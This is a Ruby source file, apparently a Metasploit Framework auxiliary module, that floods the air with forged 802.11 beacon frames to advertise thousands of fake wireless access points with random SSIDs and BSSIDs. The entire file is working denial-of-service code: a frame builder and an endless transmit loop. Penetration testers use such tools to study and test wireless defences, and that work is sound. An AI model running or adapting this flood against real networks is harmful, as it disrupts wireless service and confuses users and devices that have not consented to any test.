##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Lorcon
	include Msf::Auxiliary::Dos


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Wireless Fake Access Point Beacon Flood',
			'Description'    => %q{
				This module advertises thousands of fake access
			points, using random SSIDs and BSSID addresses. Inspired
			by Black Alchemy's fakeap tool.
			},
			
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$'
		))			
	end

	def run
		open_wifi
		print_status("Sending fake beacon frames...")
		while (true)
			wifi.write(create_frame())
		end
	end

	def create_frame

		ssid     = Rex::Text.rand_text_alpha(rand(31)+1)
		bssid    = Rex::Text.rand_text(6)
		seq      = [rand(255)].pack('n')
		
		"\x80" +                      # type/subtype
		"\x00" +                      # flags
		"\x00\x00" +                  # duration  
		"\xff\xff\xff\xff\xff\xff" +  # dst
		bssid +                       # src
		bssid +                       # bssid
		seq   +                       # seq  
		Rex::Text.rand_text(8) +      # timestamp value
		"\x64\x00" +                  # beacon interval
		"\x00\x05" +                  # capability flags
		
		# ssid tag
		"\x00" + ssid.length.chr + ssid +
		
		# supported rates
		"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
		
		# current channel
		"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr + 
		
		# traffic indication map
		"\x05" + "\x04" + "\x00\x01\x02\x20" +
		
		# country information
		"\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
		
		# erp information
		"\x2a" + "\x01" + "\x00" +
		
		# extended supported rates
		"\x32" + "\x04" + "\x12\x24\x60\x6c"

	end
	
end